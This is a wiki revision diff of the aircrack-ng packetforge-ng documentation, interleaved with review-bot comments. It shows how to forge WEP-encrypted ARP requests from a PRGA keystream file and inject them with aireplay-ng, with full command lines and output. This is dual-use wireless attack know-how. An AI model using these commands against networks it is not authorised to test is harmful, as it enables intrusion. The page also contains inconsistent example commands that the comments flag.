packetforge-ng

packetforge-ng [2007/01/25 01:24] – created darkaudax
packetforge-ng [2007/01/27 20:49] – Standardizing the format darkaudax
Line 1: Line 1:
 ====== Packetforge-ng ====== ====== Packetforge-ng ======
 +
 +
  
  
 ===== Description ===== ===== Description =====
-The purpose of packetforge-ng is to create encrypted packets that can subsequently be used for injection.  You may create various types of packets such as arp requests, UDP, ICMP and custom packets.  The most common use is to create arp requests for subsequent injection.+The purpose of packetforge-ng is to create encrypted packets that can subsequently be used for injection. You may create various types of packets such as arp requests, UDP, ICMP and custom packets.  The most common use is to create ARP requests for subsequent injection.
  
-To create an encrypted packet, you must have a PRAGA (pseudo random genration algorithm) file.  This is used to encrypt the packet you create.  This is typically obtained from [[aireplay-ng]] chopchop or fragmentation attacks.+To create an encrypted packet, you must have a PRGA (pseudo random genration algorithm) file. This is used to encrypt the packet you create.  This  is typically obtained from [[aireplay-ng]] [[korek_chopchop|chopchop]] or [[fragmentation]] attacks.
  
 ===== Usage ===== ===== Usage =====
 Usage: packetforge-ng <mode> <options> Usage: packetforge-ng <mode> <options>
  
-  Forge options:+====Forge options:====
  
       *-p <fctrl>     : set frame control word (hex)       *-p <fctrl>     : set frame control word (hex)
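Review bot: the Description paragraph still carries the typo "genration" in "(pseudo random genration algorithm)", which the rename from PRAGA to PRGA did not touch; it should read "pseudo random generation algorithm". The same paragraph now mixes "arp requests" and "ARP requests" in consecutive sentences, so capitalise both as ARP. The new heading "====Forge options:====" keeps the trailing colon of the old list label inside the heading text; drop it ("====Forge options====") now that it is a heading.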
Line 24: Line 26:
       *-w <file>      : write packet to this pcap file       *-w <file>      : write packet to this pcap file
  
-  Source options:+====Source options:====
  
       *-r <file>      : read packet from this raw file       *-r <file>      : read packet from this raw file
       *-y <file>      : read PRGA from this file       *-y <file>      : read PRGA from this file
  
-  Modes:+====Modes:====
  
       *--arp          : forge an ARP packet    (-0)       *--arp          : forge an ARP packet    (-0)
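Review bot: "====Source options:====" and "====Modes:====" carry the colon of the old list labels into the heading text; drop it so the headings read "====Source options====" and "====Modes====".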
Line 35: Line 37:
       *--icmp         : forge an ICMP packet   (-2)       *--icmp         : forge an ICMP packet   (-2)
       *--custom       : build a custom packet  (-9)       *--custom       : build a custom packet  (-9)
 +
 +
  
 ===== Usage Example ===== ===== Usage Example =====
Line 40: Line 44:
 Here is an example of how to generate an arp request packet. Here is an example of how to generate an arp request packet.
  
-First, obtain a xor file (PRAGA) with either the aireplay-ng chopchop or fragmentation method.+First, obtain a xor file (PRGA) with either the aireplay-ng chopchop or fragmentation method.
  
 Then use the following command: Then use the following command:
  
-packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request+  packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request
  
 Where: Where:
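Review bot: "First, obtain a xor file (PRGA)" should read "an xor file", and the sentence should say what the file contains, since the reader has just been told to go get one: it holds the keystream bytes (the PRGA output for one IV) recovered by the chopchop or fragmentation attack, and packetforge-ng XORs the plaintext it builds with that keystream to produce a frame the AP will accept as correctly WEP-encrypted. "arp request packet" in the first line should be "ARP request packet" to match the rest of the revision.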
Line 50: Line 54:
   *-a 00:14:6C:7E:40:80 is the Access Point MAC address   *-a 00:14:6C:7E:40:80 is the Access Point MAC address
   *-h 00:0F:B5:AB:CB:9D is the source MAC address you wish to use   *-h 00:0F:B5:AB:CB:9D is the source MAC address you wish to use
-  *-k 255.255.255.255 is the destination IP.  IE In an arp it is the "Who has this IP" +  *-k 192.168.1.100 is the destination IP.  IE In an arp it is the "Who has this IP" 
-  *-l 255.255.255.255 is the source IP.  IE In an arp is the "Tells this IP"+  *-l 192.168.1.is the source IP.  IE In an arp it is the "Tell this IP"
   *-y fragment-0124-161129.xor   *-y fragment-0124-161129.xor
   *-w arp-packet   *-w arp-packet
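Review bot: the "Where:" list no longer matches the command it explains. "-l 192.168.1.is the source IP" has lost the final octet and the space and should read "-l 192.168.1.1 is the source IP"; "*-w arp-packet" names a file the command in the Usage Example above does not use (it writes "-w arp-request"), so change it to "-w arp-request". "IE" should be "i.e." in both entries, and the -y and -w entries have no description at all; suggest "-y fragment-0124-161129.xor is the PRGA file from the fragmentation attack" and "-w arp-request is the file the forged packet is written to".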
Line 60: Line 64:
  
 The results look like this: The results look like this:
-Total number of packets read             1 +  Total number of packets read             1 
-Total number of WEP data packets         1 +  Total number of WEP data packets         1 
-Total number of WPA data packets         0 +  Total number of WPA data packets         0 
-Number of plaintext data packets         0 +  Number of plaintext data packets         0 
-Number of decrypted WEP  packets         1 +  Number of decrypted WEP  packets         1 
-Number of decrypted WPA  packets         0+  Number of decrypted WPA  packets         0
  
 To view the packet that was just decrypted, enter "tcpdump -n -vvv -e -s0 -r arp-request-dec" To view the packet that was just decrypted, enter "tcpdump -n -vvv -e -s0 -r arp-request-dec"
  
 The results look like this: The results look like this:
-reading from file arp-request-dec, link-type EN10MB (Ethernet) +  reading from file arp-request-dec, link-type EN10MB (Ethernet) 
-18:09:27.743303 00:0f:b5:ab:cb:9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.100 tell 192.168.1.1+  18:09:27.743303 00:0f:b5:ab:cb:9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.100 tell 192.168.1.1
  
-Which is exactly what we expected.  Now you can inject this arp request packet as follows "aireplay-ng -2 -r arp-request ath0".+Which is exactly what we expected. Now you can inject this arp request packet as follows "aireplay-ng -2 -r arp-request ath0".
  
 The program will respond as follows: The program will respond as follows:
  
         Size: 68, FromDS: 0, ToDS: 1 (WEP)         Size: 68, FromDS: 0, ToDS: 1 (WEP)
 +  
              BSSID  =  00:14:6C:7E:40:80              BSSID  =  00:14:6C:7E:40:80
          Dest. MAC  =  FF:FF:FF:FF:FF:FF          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:0F:B5:AB:CB:9D         Source MAC  =  00:0F:B5:AB:CB:9D
 +  
         0x0000:  0841 0201 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......         0x0000:  0841 0201 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......
         0x0010:  ffff ffff ffff 8001 6c48 0000 0999 881a  ........lH......         0x0010:  ffff ffff ffff 8001 6c48 0000 0999 881a  ........lH......
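Review bot: the counters after "The results look like this:" ("Total number of packets read ... Number of decrypted WEP packets 1") and the file "arp-request-dec" that the tcpdump command reads are produced by airdecap-ng, not by packetforge-ng, but the step that runs airdecap-ng is missing, so the reader cannot reproduce either. Insert it between the packetforge-ng command and these results, e.g. "airdecap-ng -w <WEP key in hex> arp-request", and say that this is an optional sanity check: it needs the network's WEP key, so it only works in a lab where the key is known, and the forged frame can be injected without it (the aireplay-ng step that follows is the real test). Also put the tcpdump and aireplay-ng command lines in indented code like the other commands in this revision instead of inside double quotes.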
Line 88: Line 92:
         0x0030:  3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1  :.....gC.V$.....         0x0030:  3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1  :.....gC.V$.....
         0x0040:  d64f b709                                .O..         0x0040:  d64f b709                                .O..
 +  
 +  Use this packet ? y
 +  
 +  Saving chosen packet in replay_src-0124-163529.cap
 +  You should also start airodump-ng to capture replies.
 +  End of file.
  
-Use this packet ? y+By entering "y" above, the packet you created with packetforge-ng is then injected.
  
-Saving chosen packet in replay_src-0124-163529.cap 
-You should also start airodump-ng to capture replies. 
  
-End of file.+===== Usage Tips =====
  
-By entering "y" above, the packet you created with packetforge-ng is then injected.+Most access points really don't care what IPs are used for the arp request.  So as a result you can use 255.255.255.255 for source and destination IPs. 
 + 
 +So the packetforge-ng command becomes: 
 +   packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request 
 + 
 +===== Usage Troubleshooting ===== 
 +A common mistake people make is to include either or both -j and -o flags and create invalid packets.  These flags adjust the FromDS and ToDS flages in the packet generated.  Unless you are doing something special and really know what you are doing, don't use them.  In general, they are not needed.
  
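Review bot: the Usage Tips section says to use 255.255.255.255 for both IPs, but the command introduced by "So the packetforge-ng command becomes:" still passes "-k 192.168.1.100 -l 192.168.1.1", identical to the earlier example, so the tip shows nothing; change it to "-k 255.255.255.255 -l 255.255.255.255". In Usage Troubleshooting, "flages" should be "flags", and it would help to tie the warning to the aireplay-ng output above: the frame the example produced reports "FromDS: 0, ToDS: 1 (WEP)", i.e. a station-to-AP frame, which is what the AP needs to see in order to relay the ARP request; -j and -o change exactly those bits, which is why using them without reason yields frames the AP drops.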
packetforge-ng.txt · Last modified: 2010/08/22 20:59 by mister_x